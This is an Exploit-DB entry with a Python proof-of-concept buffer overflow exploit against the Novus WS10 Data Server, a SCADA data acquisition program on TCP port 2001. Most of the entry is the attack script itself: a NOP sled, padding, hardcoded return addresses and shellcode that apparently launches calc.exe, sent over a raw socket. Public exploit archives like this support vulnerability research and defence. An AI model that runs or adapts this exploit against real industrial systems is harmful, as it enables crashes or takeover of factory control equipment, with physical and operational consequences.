WS10 Data Server - SCADA Overflow (PoC)

EDB-ID:

34752

CVE:


EDB Verified:

Author:

Pedro Sánchez

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2014-09-24

Vulnerable App: 
## Exploit Title: WS10 Data Server SCADA Exploit Overflow PoC
## Date: 09/23/2014
## Author: Pedro Sánchez
## Version: 1.83 (English)
## Tested on: Windows 7 embedded. 

## Notified the vendor, vendor never responded.
## In the new version this PoC stops working
 
## Vendor: Novus 
## http://www.novus.com.br
 
## NOVUS Electronics is a manufacturer of instruments for control, data acquisition and supervisory systems, mainly for factory automation 
 
import os
import socket
import sys

## The process listens on TCP port 2001

host = sys.argv[1]
port = int(sys.argv[2])
 
print " PoC WS10 Data Server SCADA Exploit "
print " Pedro Sanchez "
 
shellcode = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9\x44\x80\xc2\x77\xFF\xD1\x90\x90") 
 
## Exploit contructor

	ws10 = ("\x90" * 1024 + "\x44" * 31788) 
	ws10 += ("\xeb\x14") 
	ws10 += ("\x44" * 6) 
	ws10 += ("\xad\xbb\xc3\x77") 
	ws10 += ("\xb4\x73\xed\x77")  
	ws10 += ("\x90" * 21) 
	ws10 += shellcode

 
print "  [+] Sending payload..."
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host,port)) 
s.send(ws10)  
data = s.recv(1024)
 
print "  [+] Closing..."
s.close()  
print "  [+] Done!"
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services